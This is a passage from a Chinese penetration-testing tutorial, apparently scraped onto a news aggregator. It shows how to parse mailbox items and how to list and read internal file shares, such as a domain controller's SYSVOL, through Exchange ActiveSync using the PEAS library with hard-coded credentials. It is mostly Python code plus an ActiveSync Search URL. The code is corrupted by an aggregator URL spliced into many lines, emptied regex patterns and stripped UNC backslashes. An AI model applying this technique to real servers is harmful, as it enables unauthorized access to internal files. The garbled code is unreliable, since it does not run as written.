渗透|渗透技巧——通过Exchange ActiveSync访问内部文件共享( 三 )
data = http://news.hoteastday.com/a/pattern_data.findall(email)
print("ThreadTopic:"+data[0])
pattern_data = http://news.hoteastday.com/a/re.compile(r"(.*?)")
data = http://news.hoteastday.com/a/pattern_data.findall(email)
print("Importance:"+data[0])
pattern_data = http://news.hoteastday.com/a/re.compile(r"(.*?)")
data = http://news.hoteastday.com/a/pattern_data.findall(email)
print("Read:"+data[0])
pattern_data = http://news.hoteastday.com/a/re.compile(r"(.*?)")
data = http://news.hoteastday.com/a/pattern_data.findall(email)
for name in data :
print("Attachment:"+name)
pattern_data = http://news.hoteastday.com/a/re.compile(r"(.*?)")
data = http://news.hoteastday.com/a/pattern_data.findall(email)
print("ConversationIndex:"+data[0])
index1 = email.find("")
index2 = email.find("")
filename = data[0] + ".html"
print("[+] Save body to %s"%(filename))
with open(filename, "w+") as file_object:
file_object.write(email[index1:index2+7])
这里需要注意返回的邮件内容中 , 邮件正文部分的格式为html , 我的代码实现了将正文部分提取并保存成html格式 , 以唯一的ConversationIndex作为文件名 。
如果想要获得发件箱的邮件信息 , 需要修改py_activesync_helper.py , 修改的细节可参考 。 https://github.com/solbirn/pyActiveSync/blob/master/pyActiveSync/dev_playground.py#L150
(3)访问文件共享
列出共享文件的代码示例:
import peas
# Create an instance of the PEAS client.
client = peas.Peas()
# Disable certificate verification so self-signed certificates don"t cause errors.
client.disable_certificate_verification()
# Set the credentials and server to connect to.
client.set_creds({
"server": "192.168.1.1",
"user": "test1",
"password": "123456789",
})
# Retrieve a file share directory listing.
listing = client.get_unc_listing(r"\dc1SYSVOL")
for data in listing :
print("")
for key,value in data.items():
print("{key}:{value}".format(key = key, value = http://news.hoteastday.com/a/value))
读取指定共享文件内容的代码示例:
import peas
# Create an instance of the PEAS client.
client = peas.Peas()
# Disable certificate verification so self-signed certificates don"t cause errors.
client.disable_certificate_verification()
# Set the credentials and server to connect to.
client.set_creds({
"server": "192.168.1.1",
"user": "test1",
"password": "123456789",
})
data=http://news.hoteastday.com/a/client.get_unc_file(r"\dc1SYSVOL est.comPolicies{6AC1786C-016F-11D2-945F-00C04fB984F9}GPT.INI")
print(data)
0x05 通过Exchange ActiveSync访问内部文件共享的细节
1.列出共享文件
访问的URL示例:
https://192.168.1.1/Microsoft-Server-ActiveSync?Cmd=Search&User=test1&DeviceId=123456&DeviceType=Python"
参数说明如下:
·Cmd=Search , 表示命令类型为Search
推荐阅读
- 模型|REVIT技巧!如何创建能量模型,实现能量优化
- 手机使用技巧|宝宝照片太多怎么办?4种不占手机内存的存储方式,最后一种更安全
- 新机发布|小米神秘5G新机正式通过工信部入网,红米K30即将成明日黄花
- 行业互联网|最前线丨泰格医药通过港交所上市聆讯,或将实现“A+H”两地上市
- 电脑使用技巧|Word文字技巧—如何将Excel转换成Word
- windows系统,电脑使用技巧|第三方 Fluent Design 图标设计集预示未来 Win 10 风格
- 电脑使用技巧|写论文要注意什么问题?
- 电脑使用技巧|微软承认Windows 10新BUG:错误显示没有网络连接
- |三星Note20通过FCC认证:机身尺寸以及参数终于确认
- 电脑使用技巧|dos命令cd图文教程,改变当前目录路径chdir批处理